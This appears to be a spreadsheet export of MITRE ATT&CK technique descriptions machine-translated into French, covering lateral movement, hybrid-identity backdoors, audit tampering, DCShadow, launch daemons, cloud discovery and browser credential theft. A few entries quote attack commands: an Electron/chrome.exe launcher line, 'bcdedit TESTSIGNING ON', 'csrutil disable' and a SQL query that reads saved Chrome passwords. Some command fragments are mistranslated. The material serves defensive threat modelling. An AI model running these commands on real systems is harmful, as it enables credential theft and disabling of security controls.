Dans un environnement d’entreprise, les serveurs et les postes de travail peuvent être organisés en domaines. Les domaines offrent une gestion centralisée des identités, permettant aux utilisateurs de se connecter à l’aide d’un ensemble d’informations d’identification sur l’ensemble du réseau. Si un adversaire est en mesure d’obtenir un ensemble d’informations d’identification de domaine valides, il peut se connecter à de nombreuses machines différentes à l’aide de protocoles d’accès à distance tels que SSH (Secure Shell) ou RDP (Remote Desktop Protocol). (Citation : SSH Secure Shell)(Citation : Services de bureau à distance TechNet) Ils pourraient également se connecter à des services SaaS ou IaaS accessibles, tels que ceux qui fédérent leurs identités au domaine. 
Les applications légitimes (telles que les [Outils de déploiement de logiciels](https://attack.mitre.org/techniques/T1072) et d’autres programmes administratifs) peuvent utiliser les [Services à distance](https://attack.mitre.org/techniques/T1021) pour accéder aux hôtes distants. Par exemple, Apple Remote Desktop (ARD) sur macOS est un logiciel natif utilisé pour la gestion à distance. ARD exploite un mélange de protocoles, notamment [VNC](https://attack.mitre.org/techniques/T1021/005) pour envoyer les tampons d’écran et de contrôle et [SSH](https://attack.mitre.org/techniques/T1021/004) pour le transfert sécurisé de fichiers. (Citation : Gestion à distance MDM macOS)(Citation : Kickstart Apple Remote Desktop commandes)(Citation : Guide de l’administrateur du bureau à distance Apple 3.3) Les adversaires peuvent abuser d’applications telles que ARD pour exécuter du code à distance et effectuer des mouvements latéraux. Dans les versions de macOS antérieures à la version 10.14, un adversaire peut transformer une session SSH en une session ARD, ce qui lui permet d’accepter les invites TCC (Transparence, Consentement et Contrôle) sans interaction avec l’utilisateur et d’accéder aux données. (Citation : FireEye 2019 Apple Remote Desktop)(Citation : Lockboxx ARD 2019)(Citation : Kickstart Apple Remote Desktop commandes)
https://attack.mitre.org/techniques/T1021</t>
  </si>
  <si>
    <t>Les adversaires peuvent communiquer à l’aide de protocoles de couche application associés à la distribution de courrier électronique pour éviter la détection/le filtrage du réseau en se fondant dans le trafic existant. Les commandes adressées au système distant, et souvent les résultats de ces commandes, seront incorporés dans le trafic de protocole entre le client et le serveur. 
Les protocoles tels que SMTP/S, POP3/S et IMAP qui transportent le courrier électronique peuvent être très courants dans les environnements.  Les paquets produits à partir de ces protocoles peuvent comporter de nombreux champs et en-têtes dans lesquels les données peuvent être dissimulées. Les données peuvent également être dissimulées dans les e-mails eux-mêmes. Un adversaire peut abuser de ces protocoles pour communiquer avec les systèmes sous son contrôle au sein d’un réseau victime tout en imitant le trafic normal et attendu. (Référence : FireEye APT28)
https://attack.mitre.org/techniques/T1071/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent corriger, modifier ou détourner les processus d’authentification dans le cloud liés aux identités des utilisateurs locaux afin de contourner les mécanismes d’authentification classiques, d’accéder aux informations d’identification et d’activer l’accès persistant aux comptes.  
De nombreuses organisations conservent des identités d’utilisateur et d’appareil hybrides qui sont partagées entre les environnements sur site et dans le cloud. Ceux-ci peuvent être entretenus de plusieurs façons. Par exemple, Microsoft Entra ID inclut trois options pour synchroniser les identités entre Active Directory et Entra ID (Citation : Azure AD Hybrid Identity) :
* Synchronisation de hachage de mot de passe (PHS), dans laquelle un compte local privilégié synchronise les hachages de mot de passe de l’utilisateur entre Active Directory et Entra ID, permettant ainsi à l’authentification à Entra ID d’avoir lieu entièrement dans le cloud 
* Authentification directe (PTA), dans laquelle les tentatives d’authentification Entra ID sont transmises à un agent PTA sur site, qui valide les informations d’identification par rapport à Active Directory 
* Active Directory Federation Services (AD FS), dans lequel une relation de confiance est établie entre Active Directory et Entra ID 
AD FS peut également être utilisé avec d’autres plateformes SaaS et cloud telles qu’AWS et GCP, qui transfèrent le processus d’authentification à AD FS et reçoivent un jeton contenant l’identité et les privilèges des utilisateurs hybrides. 
En modifiant les processus d’authentification liés aux identités hybrides, un adversaire peut être en mesure d’établir un accès privilégié persistant aux ressources cloud. Par exemple, les adversaires qui compromettent un serveur local exécutant un agent PTA peuvent injecter une DLL malveillante dans le processus « AzureADConnectAuthenticationAgentService » qui autorise toutes les tentatives d’authentification auprès d’Entra ID et enregistre les informations d’identification de l’utilisateur. (citation : Azure AD Connect pour les membres de l’équipe de lecture)(citation : AADInternals Azure AD On-Prem to Cloud) Dans les environnements utilisant AD FS, un adversaire peut modifier le fichier de configuration « Microsoft.IdentityServer.Servicehost » pour charger une DLL malveillante qui génère des jetons d’authentification pour tout utilisateur avec n’importe quel ensemble de revendications, contournant ainsi l’authentification multifacteur et les stratégies AD FS définies. (Citation : MagicWeb)
Dans certains cas, les adversaires peuvent être en mesure de modifier le processus d’authentification d’identité hybride à partir du cloud. Par exemple, les adversaires qui compromettent un compte d’administrateur général dans un locataire Entra ID peuvent être en mesure d’inscrire un nouvel agent PTA via la console Web, ce qui leur permet de collecter des informations d’identification et de se connecter à l’environnement Entra ID comme n’importe quel utilisateur. (Citation : Mandiant Azure AD Backdoors)
https://attack.mitre.org/techniques/T1556/007</t>
  </si>
  <si>
    <t>Les adversaires peuvent analyser les victimes à la recherche de vulnérabilités qui peuvent être utilisées lors du ciblage. Les analyses de vulnérabilité vérifient généralement si la configuration d’un hôte/d’une application cible (par exemple, le logiciel et la version) s’aligne potentiellement sur la cible d’un exploit spécifique que l’adversaire peut chercher à utiliser.
Ces analyses peuvent également inclure des tentatives plus larges de [Recueillir des informations sur l’hôte victime](https://attack.mitre.org/techniques/T1592) qui peuvent être utilisées pour identifier des vulnérabilités exploitables plus courantes. Les analyses de vulnérabilité récoltent généralement les logiciels en cours d’exécution et les numéros de version via des bannières de serveur, des ports d’écoute ou d’autres artefacts réseau. (Citation : OWASP Vuln Scanning) Les informations recueillies lors de ces analyses peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Recherche dans des sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593) ou [Recherche dans des bases de données techniques ouvertes](https://attack.mitre.org/techniques/T1596)), l’établissement de ressources opérationnelles (ex : [Développer des capacités](https://attack.mitre.org/techniques/T1587) ou [Obtenir des capacités](https://attack.mitre.org/techniques/T1588)), et/ou un accès initial (ex : [Exploiter le public-Facing Champ d’application](https://attack.mitre.org/techniques/T1190)).
https://attack.mitre.org/techniques/T1595/002</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des API cloud pour exécuter des commandes malveillantes. Les API disponibles dans les environnements cloud offrent diverses fonctionnalités et constituent une méthode riche en fonctionnalités pour l’accès programmatique à presque tous les aspects d’un locataire. Ces API peuvent être utilisées par le biais de diverses méthodes telles que les interpréteurs de ligne de commande (CLI), les Cloud Shells dans le navigateur, les modules [PowerShell](https://attack.mitre.org/techniques/T1059/001) tels qu’Azure pour PowerShell (Référence : Microsoft - Azure PowerShell) ou les kits de développement logiciel (SDK) disponibles pour des langages tels que [Python](https://attack.mitre.org/techniques/T1059/006).  
La fonctionnalité de l’API cloud peut permettre un accès administratif à tous les principaux services d’un locataire, tels que le calcul, le stockage, la gestion des identités et des accès (IAM), la mise en réseau et les stratégies de sécurité.
Avec les autorisations appropriées (souvent via l’utilisation d’informations d’identification telles que [Jeton d’accès à l’application](https://attack.mitre.org/techniques/T1550/001) et [Cookie de session Web](https://attack.mitre.org/techniques/T1550/004)), les adversaires peuvent abuser des API cloud pour invoquer diverses fonctions qui exécutent des actions malveillantes. Par exemple, les fonctionnalités CLI et PowerShell peuvent être accessibles via des fichiers binaires installés sur des hôtes hébergés dans le cloud ou sur site, ou accessibles via un shell cloud basé sur un navigateur proposé par de nombreuses plateformes cloud (telles que AWS, Azure et GCP). Ces Cloud Shells sont souvent un environnement unifié packagé permettant d’utiliser des modules CLI et/ou de script hébergés en tant que conteneur dans l’environnement cloud.
https://attack.mitre.org/techniques/T1059/009</t>
  </si>
  <si>
    <t>Les adversaires peuvent rechercher dans des bases de données techniques librement disponibles des informations sur les victimes qui peuvent être utilisées lors du ciblage. Des informations sur les victimes peuvent être disponibles dans des bases de données et des dépôts en ligne, tels que des enregistrements de domaines/certificats ainsi que des collections publiques de données/artefacts de réseau recueillis à partir du trafic et/ou des analyses. (Citation : WHOIS)(Citation : benne à ordures DNS)(Citation : Circl DNS passif)(Citation : Certificat SSL moyen)(Citation : SSLShopper Lookup)(Citation : CDN DigitalShadows)(Citation : Shodan)
Les adversaires peuvent effectuer des recherches dans différentes bases de données ouvertes en fonction des informations qu’ils cherchent à recueillir. Les informations provenant de ces sources peuvent révéler des possibilités pour d’autres formes de reconnaissance (ex : [Hameçonnage pour obtenir des informations](https://attack.mitre.org/techniques/T1598) ou [Recherche de sites Web/domaines ouverts](https://attack.mitre.org/techniques/T1593)), d’établissement de ressources opérationnelles (ex : [Acquisition d’infrastructure](https://attack.mitre.org/techniques/T1583) ou [Compromission d’infrastructure](https://attack.mitre.org/techniques/T1584)), et/ou d’accès initial (ex : [Externe distant Services](https://attack.mitre.org/techniques/T1133) ou [Relation de confiance](https://attack.mitre.org/techniques/T1199)).
https://attack.mitre.org/techniques/T1596</t>
  </si>
  <si>
    <t>Les adversaires peuvent abuser des composants du cadre Electron pour exécuter du code malveillant. Le framework Electron héberge de nombreuses applications courantes telles que Signal, Slack et Microsoft Teams. (Citation : Electron 2) Développé à l’origine par GitHub, Electron est un cadre de développement d’applications de bureau multiplateforme qui utilise des technologies Web telles que JavaScript, HTML et CSS. (Citation : Electron 3) Le moteur Chromium est utilisé pour afficher le contenu Web et exécute Node.js le code principal. (Citation : Électron 1)
En raison des mécanismes fonctionnels d’Electron (comme le fait de permettre aux applications d’exécuter des commandes arbitraires), les adversaires peuvent également être en mesure d’exécuter des fonctions malveillantes en arrière-plan potentiellement déguisées en outils légitimes dans le cadre. (Citation : Électron 1) Par exemple, l’utilisation abusive de 'teams.exe' et 'chrome.exe' peut permettre à des adversaires d’exécuter des commandes malveillantes en tant que processus enfants de l’application légitime (par exemple, 'chrome.exe --disable-gpu-sandbox --gpu-launcher="C :\Windows\system32\cmd.exe /c calc.exe'). (Citation : Electron 6-8)
Les adversaires peuvent également exécuter du contenu malveillant en plantant des applications malveillantes [JavaScript](https://attack.mitre.org/techniques/T1059/007) dans les applications Electron. (Citation : Sécurité électronique)
https://attack.mitre.org/techniques/T1218/015</t>
  </si>
  <si>
    <t>Les adversaires peuvent désactiver ou modifier le système d’audit Linux pour masquer les activités malveillantes et éviter d’être détectés. Les administrateurs Linux utilisent le système d’audit Linux pour suivre les informations de sécurité sur un système. Le système d’audit Linux fonctionne au niveau du noyau et conserve des journaux d’événements sur l’activité de l’application et du système, comme les événements de processus, de réseau, de fichier et de connexion, en fonction de règles préconfigurées.
Souvent appelé 'auditd', il s’agit du nom du démon utilisé pour écrire les événements sur le disque et est régi par les paramètres définis dans le fichier de configuration 'audit.conf'. Deux façons principales de configurer les règles de génération de journaux sont d’utiliser l’utilitaire de ligne de commande 'auditctl' et le fichier '/etc/audit/audit.rules', contenant une séquence de commandes 'auditctl' chargées au démarrage. (Citation : Audit du système Red Hat)(Citation : Détection des menaces auditée IzyKnows 2022)
Avec les privilèges root, les adversaires peuvent être en mesure de s’assurer que leur activité n’est pas consignée en désactivant le service système d’audit, en modifiant les fichiers de configuration/règle ou en raccrochant les fonctions de bibliothèque du système d’audit. À l’aide de la ligne de commande, les adversaires peuvent désactiver le service système d’audit en tuant les processus associés au démon « auditd » ou en utilisant « systemctl » pour arrêter le service d’audit. Les adversaires peuvent également accrocher les fonctions du système d’audit pour désactiver la journalisation ou modifier les règles contenues dans les fichiers '/etc/audit/audit.rules' ou 'audit.conf' pour ignorer les activités malveillantes. (Citation : Trustwave Honeypot SkidMap 2023)(Citation : ESET Ebury février 2014)
https://attack.mitre.org/techniques/T1562/012</t>
  </si>
  <si>
    <t>Les adversaires peuvent enregistrer un contrôleur de domaine non autorisé pour permettre la manipulation des données Active Directory. DCShadow peut être utilisé pour créer un contrôleur de domaine non autorisé. DCShadow est une méthode de manipulation des données Active Directory (AD), y compris les objets et les schémas, en enregistrant (ou en réutilisant un enregistrement inactif) et en simulant le comportement d’un contrôleur de domaine. (Citation : Blog DCShadow) Une fois enregistré, un contrôleur de domaine non autorisé peut être en mesure d’injecter et de répliquer les modifications apportées à l’infrastructure AD pour n’importe quel objet de domaine, y compris les informations d’identification et les clés.
L’enregistrement d’un contrôleur de domaine non autorisé implique la création d’un serveur et d’objets nTDSDSA dans la partition de configuration du schéma AD, ce qui nécessite des privilèges d’administrateur (domaine ou local au contrôleur de domaine) ou le hachage KRBTGT. (Citation : Guide Adsecurity Mimikatz)
Cette technique peut contourner la journalisation du système et les moniteurs de sécurité tels que les produits de gestion des informations et des événements de sécurité (SIEM) (puisque les actions entreprises sur un contrôleur de domaine non autorisé peuvent ne pas être signalées à ces capteurs). (Citation : Blog DCShadow) Cette technique peut également être utilisée pour modifier et supprimer la réplication et d’autres métadonnées associées afin d’entraver l’analyse médico-légale. Les adversaires peuvent également utiliser cette technique pour effectuer [l’injection de l’historique SID](https://attack.mitre.org/techniques/T1134/005) et/ou manipuler des objets AD (tels que des comptes, des listes de contrôle d’accès, des schémas) afin d’établir des portes dérobées pour la persistance. (Citation : Blog DCShadow)
https://attack.mitre.org/techniques/T1207</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier les politiques de signature de code pour permettre l’exécution de code non signé ou auto-signé. La signature de code fournit un niveau d’authenticité sur un programme d’un développeur et une garantie que le programme n’a pas été altéré. Les contrôles de sécurité peuvent inclure des mécanismes d’application pour s’assurer que seul le code valide et signé peut être exécuté sur un système d’exploitation. 
Certains de ces contrôles de sécurité peuvent être activés par défaut, tels que l’application de la signature du pilote (DSE) sous Windows ou la protection de l’intégrité du système (SIP) sur macOS. (Citation : Microsoft DSE juin 2017)(Citation : Apple désactive SIP) D’autres contrôles de ce type peuvent être désactivés par défaut, mais sont configurables via des contrôles d’application, tels que l’autorisation de n’exécuter que des bibliothèques de liens dynamiques (DLL) signées sur un système. Étant donné qu’il peut être utile pour les développeurs de modifier les stratégies d’application de signature par défaut lors du développement et du test d’applications, la désactivation de ces fonctionnalités peut être possible avec des autorisations élevées. (Citation : Pilote Microsoft non signé avril 2017)(Citation : Apple désactive SIP)
Les adversaires peuvent modifier les politiques de signature de code de plusieurs façons, notamment à l’aide d’utilitaires de ligne de commande ou d’interface graphique, de [Modifier le registre](https://attack.mitre.org/techniques/T1112), en redémarrant l’ordinateur en mode de débogage/récupération ou en modifiant la valeur des variables dans la mémoire du noyau. (Citation : Microsoft TESTSIGNING février 2021)(Citation : Apple désactive SIP)(Citation : FireEye HIKIT Rootkit Partie 2)(Citation : GitHub Turla Driver Loader) Parmi les exemples de commandes qui peuvent modifier la politique de signature de code d’un système, citons &lt;code&gt;bcdedit.exe -set TESTSIGNING ON&lt;/code&gt; sous Windows et &lt;code&gt;csrutil disable&lt;/code&gt; sur macOS. (Citation : Microsoft TESTSIGNING février 2021)(Citation : Apple désactive SIP) Selon l’implémentation, la modification réussie d’une politique de signature peut nécessiter le redémarrage du système compromis. De plus, certaines implémentations peuvent introduire des artefacts visibles pour l’utilisateur (par exemple, un filigrane dans le coin de l’écran indiquant que le système est en mode test). Les adversaires peuvent tenter de supprimer ces artefacts. (Citation : F-Secure BlackEnergy 2014)
Pour accéder à la mémoire du noyau afin de modifier des variables liées aux vérifications de signature, telles que la modification &lt;code&gt;g_CiOptions&lt;/code&gt; pour désactiver l’application de signature du pilote, les adversaires peuvent effectuer [Exploitation pour l’élévation de privilèges](https://attack.mitre.org/techniques/T1068) à l’aide d’un pilote signé, mais vulnérable. (Citation : Unit42 AcidBox, juin 2020)(Citation : GitHub Turla Driver Loader)
https://attack.mitre.org/techniques/T1553/006</t>
  </si>
  <si>
    <t>Les adversaires peuvent déployer un conteneur dans un environnement pour faciliter l’exécution ou échapper aux défenses. Dans certains cas, les adversaires peuvent déployer un nouveau conteneur pour exécuter des processus associés à une image ou à un déploiement particulier, tels que des processus qui exécutent ou téléchargent des programmes malveillants. Dans d’autres, un adversaire peut déployer un nouveau conteneur configuré sans règles de réseau, sans limitations d’utilisateurs, etc. pour contourner les défenses existantes dans l’environnement. Dans les environnements Kubernetes, un adversaire peut tenter de déployer un conteneur privilégié ou vulnérable dans un nœud spécifique afin de [S’échapper vers l’hôte](https://attack.mitre.org/techniques/T1611) et d’accéder à d’autres conteneurs s’exécutant sur le nœud. (Citation : AppSecco Kubernetes Namespace Breakout 2020)
Les conteneurs peuvent être déployés de différents manières, par exemple via les API de &lt;code&gt;création&lt;/code&gt; et de &lt;code&gt;démarrage&lt;/code&gt; de Docker ou via une application web telle que le tableau de bord Kubernetes ou Kubeflow. (Citation : API Docker Containers)(Citation : Tableau de bord Kubernetes)(Citation : Kubeflow Pipelines) Dans les environnements Kubernetes, les conteneurs peuvent être déployés via des charges de travail telles que ReplicaSets ou DaemonSets, ce qui permet de déployer des conteneurs sur plusieurs nœuds. (Citation : Gestion de la charge de travail Kubernetes) Les adversaires peuvent déployer des conteneurs basés sur des images malveillantes récupérées ou construites ou à partir d’images bénignes qui téléchargent et exécutent des charges utiles malveillantes au moment de l’exécution. (Citation : Images Aqua Build sur les hôtes)
https://attack.mitre.org/techniques/T1610</t>
  </si>
  <si>
    <t>Les adversaires peuvent interagir avec le registre Windows pour masquer les informations de configuration dans les clés de registre, supprimer des informations dans le cadre du nettoyage ou dans le cadre d’autres techniques pour faciliter la persistance et l’exécution.
L’accès à des zones spécifiques du registre dépend des autorisations du compte, certaines nécessitant un accès de niveau administrateur. L’utilitaire de ligne de commande Windows intégré [Reg](https://attack.mitre.org/software/S0075) peut être utilisé pour la modification du registre local ou à distance. (Référence : Microsoft Reg) D’autres outils peuvent également être utilisés, tels qu’un outil d’accès à distance, qui peut contenir des fonctionnalités permettant d’interagir avec le registre via l’API Windows.
Les modifications du registre peuvent également inclure des actions visant à masquer des clés, telles que l’ajout d’un caractère nul aux noms de touches, qui provoquera une erreur et/ou sera ignoré lors de la lecture via [Reg](https://attack.mitre.org/software/S0075) ou d’autres utilitaires utilisant l’API Win32. (Référence : Microsoft Reghide NOV 2006) Les adversaires peuvent abuser de ces clés pseudo-cachées pour dissimuler des charges utiles/commandes utilisées pour maintenir la persistance. (Citation : TrendMicro POWELIKS AOÛT 2014) (Citation : SpectorOps Hiding Reg juillet 2017)
Le registre d’un système distant peut être modifié pour faciliter l’exécution des fichiers dans le cadre d’un mouvement latéral. Il nécessite que le service de registre distant s’exécute sur le système cible. (Citation : Microsoft Remote) Souvent, des [comptes valides](https://attack.mitre.org/techniques/T1078) sont nécessaires, ainsi qu’un accès aux [partages SMB/Windows Admin](https://attack.mitre.org/techniques/T1021/002) du système distant pour la communication RPC.
https://attack.mitre.org/techniques/T1112</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer ou modifier des démons de lancement pour exécuter des charges utiles malveillantes dans le cadre de la persistance. Les démons de lancement sont des fichiers plist utilisés pour interagir avec Launchd, l’infrastructure de gestion de services utilisée par macOS. L’installation des démons de lancement nécessite des privilèges élevés, est exécutée pour chaque utilisateur d’un système avant la connexion et s’exécute en arrière-plan sans qu’il soit nécessaire d’interagir avec l’utilisateur. Lors du démarrage de l’initialisation de macOS, le processus launchd charge les paramètres des démons système de lancement à la demande à partir des fichiers plist trouvés dans &lt;code&gt;/System/Library/LaunchDaemons/&lt;/code&gt; et &lt;code&gt;/Library/LaunchDaemons/&lt;/code&gt;. Les paramètres de démon de lancement requis incluent une &lt;code&gt;étiquette&lt;/code&gt; pour identifier la tâche, un &lt;code&gt;programme&lt;/code&gt; pour fournir un chemin d’accès à l’exécutable et &lt;code&gt;RunAtLoad&lt;/code&gt; pour spécifier le moment de l’exécution de la tâche. Les démons de lancement sont souvent utilisés pour fournir un accès à des ressources partagées, des mises à jour de logiciels ou des tâches d’automatisation. (Citation : démons de l’agent de lancement AppleDocs)(Citation : Méthodes de persistance des logiciels malveillants Mac)(Citation : launchd Mots-clés pour plists)
Les adversaires peuvent installer un démon de lancement configuré pour s’exécuter au démarrage à l’aide du paramètre &lt;code&gt;RunAtLoad&lt;/code&gt; défini sur &lt;code&gt;true&lt;/code&gt; et du paramètre &lt;code&gt;Program&lt;/code&gt; défini sur le chemin d’accès de l’exécutable malveillant. Le nom du démon peut être déguisé en utilisant un nom provenant d’un système d’exploitation associé ou d’un logiciel inoffensif (c’est-à-dire [Masquerading](https://attack.mitre.org/techniques/T1036)). Lorsque le démon de lancement est exécuté, le programme hérite des autorisations administratives. (Citation : WireLurker)(Citation : Détection des logiciels malveillants OSX)
De plus, les modifications de la configuration du système (telles que l’installation d’un logiciel de gestion de paquets tiers) peuvent rendre des dossiers tels que &lt;code&gt;usr/local/bin accessibles en&lt;/code&gt; écriture à l’échelle mondiale. Ainsi, il est possible que des configurations médiocres permettent à un adversaire de modifier les exécutables référencés par les fichiers plist de Launch Daemon actuels. (Citation : Détournement de LaunchDaemon)(Citation : sentinelone macos persist juin 2019)
https://attack.mitre.org/techniques/T1543/004</t>
  </si>
  <si>
    <t>Un adversaire peut tenter de découvrir l’infrastructure et les ressources disponibles dans un environnement d’infrastructure en tant que service (IaaS). Cela inclut les ressources de service de calcul telles que les instances, les machines virtuelles et les instantanés, ainsi que les ressources d’autres services, notamment les services de stockage et de base de données.
Les fournisseurs de cloud proposent des méthodes telles que des API et des commandes émises par le biais d’interfaces de ligne de commande pour fournir des informations sur l’infrastructure. Par exemple, AWS fournit une API &lt;code&gt;DescribeInstances&lt;/code&gt; au sein de l’API Amazon EC2 qui peut renvoyer des informations sur une ou plusieurs instances d’un compte, l’API &lt;code&gt;ListBuckets&lt;/code&gt; qui renvoie une liste de tous les compartiments appartenant à l’expéditeur authentifié de la demande, l’API &lt;code&gt;HeadBucket&lt;/code&gt; pour déterminer l’existence d’un compartiment ainsi que les autorisations d’accès de l’expéditeur de la demande,  ou l’API &lt;code&gt;GetPublicAccessBlock&lt;/code&gt; pour récupérer la configuration du bloc d’accès pour un compartiment. (citation : Amazon Describe Instance)(Citation : API Amazon Describe Instances)(Citation : AWS Get Public Access Block)(Citation : AWS Head Bucket) De même, l’interface de ligne de commande Cloud SDK de GCP fournit la commande &lt;code&gt;gcloud compute instances list&lt;/code&gt; pour répertorier toutes les instances Google Compute Engine d’un projet (Citation : Google Compute Instances), et la commande CLI &lt;code&gt;az vm list&lt;/code&gt; d’Azure répertorie les détails des machines virtuelles. (Citation : Microsoft AZ CLI) En plus des commandes API, les adversaires peuvent utiliser des outils open source pour découvrir l’infrastructure de stockage dans le cloud via [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003). (Citation : Malwarebytes OSINT Leaky Buckets - Hioureas)
Un adversaire peut énumérer des ressources à l’aide des clés d’accès d’un utilisateur compromis pour déterminer celles qui sont disponibles pour cet utilisateur. (Citation : Expulser IO Evil dans AWS) La découverte de ces ressources disponibles peut aider les adversaires à déterminer leurs prochaines étapes dans l’environnement Cloud, telles que l’établissement de la persistance. (Citation : Mandiant M-Trends 2020)Un adversaire peut également utiliser ces informations pour modifier la configuration afin de rendre le compartiment accessible au public, ce qui permet d’accéder aux données sans authentification. Les adversaires peuvent également utiliser des API de découverte d’infrastructure telles que &lt;code&gt;DescribeDBInstances&lt;/code&gt; pour déterminer la taille, le propriétaire, les autorisations et les listes de contrôle d’accès réseau des ressources de base de données. (citation : AWS décrit les instances de base de données) Les adversaires peuvent utiliser ces informations pour déterminer la valeur potentielle des bases de données et découvrir les conditions requises pour y accéder. Contrairement à [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), cette technique se concentre sur la découverte des composants des services fournis plutôt que sur les services eux-mêmes.
https://attack.mitre.org/techniques/T1580</t>
  </si>
  <si>
    <t>Les adversaires peuvent acquérir des informations d’identification à partir de navigateurs Web en lisant des fichiers spécifiques au navigateur cible. (Citation : Talos Olympic Destroyer 2018) Les navigateurs Web enregistrent généralement des informations d’identification telles que les noms d’utilisateur et les mots de passe afin qu’elles n’aient pas besoin d’être saisies manuellement à l’avenir. Les navigateurs Web stockent généralement les informations d’identification dans un format chiffré au sein d’un magasin d’informations d’identification. Cependant, il existe des méthodes pour extraire les informations d’identification en texte brut des navigateurs Web.
Par exemple, sur les systèmes Windows, les informations d’identification chiffrées peuvent être obtenues à partir de Google Chrome en lisant un fichier de base de données, &lt;code&gt;AppData\Local\Google\Chrome\User Data\Default\Login Data&lt;/code&gt; et en exécutant une requête SQL : &lt;code&gt;SELECT action_url, username_value password_value FROM logins ;&lt;/code&gt;. Le mot de passe en clair peut ensuite être obtenu en transmettant les informations d’identification chiffrées à la fonction &lt;code&gt;d’API Windows CryptUnprotectData&lt;/code&gt;, qui utilise les informations d’identification de connexion mises en cache de la victime comme clé de déchiffrement. (Citation : Microsoft CryptUnprotectData, avril 2018)
Les adversaires ont exécuté des procédures similaires pour les navigateurs Web courants tels que FireFox, Safari, Edge, etc. (Citation : Proofpoint Vega Credential Stealer mai 2018) (Citation : FireEye HawkEye Malware juillet 2017) Windows stocke les informations d’identification Internet Explorer et Microsoft Edge dans des verrouilles d’informations d’identification gérés par le [Windows Credential Manager](https://attack.mitre.org/techniques/T1555/004).
Les adversaires peuvent également acquérir des informations d’identification en recherchant dans la mémoire de processus du navigateur Web des modèles qui correspondent généralement aux informations d’identification. (Citation : GitHub Mimikittenz juillet 2016)
Après avoir acquis des informations d’identification à partir de navigateurs Web, les adversaires peuvent tenter de recycler les informations d’identification sur différents systèmes et/ou comptes afin d’étendre l’accès. Cela peut avoir pour effet de favoriser considérablement l’objectif d’un adversaire dans les cas où les informations d’identification obtenues à partir de navigateurs Web chevauchent des comptes privilégiés (par exemple, un administrateur de domaine).
https://attack.mitre.org/techniques/T1555/003</t>
  </si>
  <si>
    <t>Les adversaires peuvent exécuter leurs propres charges utiles malveillantes en détournant l’ordre de recherche utilisé pour charger d’autres programmes. Étant donné que certains programmes n’appellent pas d’autres programmes en utilisant le chemin d’accès complet, les adversaires peuvent placer leur propre fichier dans le répertoire où se trouve le programme appelant, ce qui oblige le système d’exploitation à lancer leur logiciel malveillant à la demande du programme appelant.
Le détournement de l’ordre de recherche se produit lorsqu’un adversaire abuse de l’ordre dans lequel Windows recherche des programmes qui ne reçoivent pas de chemin d’accès. Contrairement à [Détournement de l’ordre de recherche DLL](https://attack.mitre.org/techniques/T1574/001), l’ordre de recherche diffère selon la méthode utilisée pour exécuter le programme. (Citation : Microsoft CreateProcess) (Citation : Windows NT Command Shell) (Citation : Microsoft WinExec) Cependant, il est courant pour Windows d’effectuer une recherche dans le répertoire du programme initiateur avant de rechercher dans le répertoire système de Windows. Un adversaire qui trouve un programme vulnérable au détournement d’ordre de recherche (c’est-à-dire un programme qui ne spécifie pas le chemin d’accès à un exécutable) peut tirer parti de cette vulnérabilité en créant un programme nommé d’après le programme mal spécifié et en le plaçant dans le répertoire du programme initiateur.
Par exemple, « example.exe » exécute « cmd.exe » avec l’argument de ligne de commande &lt;code&gt;net user&lt;/code&gt;. Un adversaire peut placer un programme appelé « net.exe » dans le même répertoire que example.exe, « net.exe » sera exécuté à la place du réseau de l’utilitaire système Windows. De plus, si un adversaire place un programme appelé « net.com » dans le même répertoire que « net.exe », alors &lt;code&gt;cmd.exe utilisateur net /C&lt;/code&gt; exécutera « net.com » au lieu de « net.exe » en raison de l’ordre des extensions exécutables défini sous PATHEXT. (citation : Propriété de l’environnement Microsoft)
Le détournement d’ordre de recherche est également une pratique courante pour le détournement de charges DLL et est couvert dans [Détournement d’ordre de recherche DLL](https://attack.mitre.org/techniques/T1574/001).
https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t>Les adversaires peuvent modifier le contenu visuel disponible en interne ou en externe sur un réseau d’entreprise, affectant ainsi l’intégrité du contenu d’origine. Les raisons de [Defigurement](https://attack.mitre.org/techniques/T1491) comprennent l’envoi de messages, l’intimidation ou la revendication (éventuellement fausse) du crédit d’une intrusion. Des images dérangeantes ou offensantes peuvent être utilisées dans le cadre de [Dégradation](https://attack.mitre.org/techniques/T1491) afin de causer un malaise à l’utilisateur ou de faire pression sur le respect des messages d’accompagnement.
https://attack.mitre.org/techniques/T1491</t>
  </si>
  <si>
    <t>Les adversaires peuvent créer des instances cloud dans des régions de service géographiques inutilisées afin d’échapper à la détection. L’accès est généralement obtenu par le biais de comptes compromettants utilisés pour gérer l’infrastructure cloud.
Les fournisseurs de services cloud fournissent souvent une infrastructure dans le monde entier afin d’améliorer les performances, d’assurer la redondance et de permettre aux clients de répondre aux exigences de conformité. Souvent, un client n’utilise qu’un sous-ensemble des régions disponibles et ne surveille pas activement les autres régions. Si un adversaire crée des ressources dans une région inutilisée, il peut être en mesure d’opérer sans être détecté.
Une variante de ce comportement tire parti des différences de fonctionnalités entre les régions cloud. Un adversaire peut utiliser des régions qui ne prennent pas en charge les services de détection avancés afin d’éviter la détection de son activité.
Un exemple d’utilisation par l’adversaire de régions AWS inutilisées est le minage de cryptomonnaie par le biais du [détournement de ressources](https://attack.mitre.org/techniques/T1496), ce qui peut coûter des sommes d’argent considérables aux organisations au fil du temps en fonction de la puissance de traitement utilisée. (Citation : CloudSploit - Régions AWS inutilisées)
https://attack.mitre.org/techniques/T1535</t>
  </si>
  <si>
    <t>Les adversaires peuvent rediriger le trafic réseau vers des systèmes appartenant à l’adversaire en usurpant le trafic DHCP (Dynamic Host Configuration Protocol) et en agissant comme un serveur DHCP malveillant sur le réseau victime. En atteignant la position de l’adversaire intermédiaire (AiTM), les adversaires peuvent collecter les communications réseau, y compris les informations d’identification transmises, en particulier celles envoyées via des protocoles non sécurisés et non chiffrés. Cela peut également permettre des comportements ultérieurs tels que [Reniflage de réseau](https://attack.mitre.org/techniques/T1040) ou [Manipulation de données transmises](https://attack.mitre.org/techniques/T1565/002).
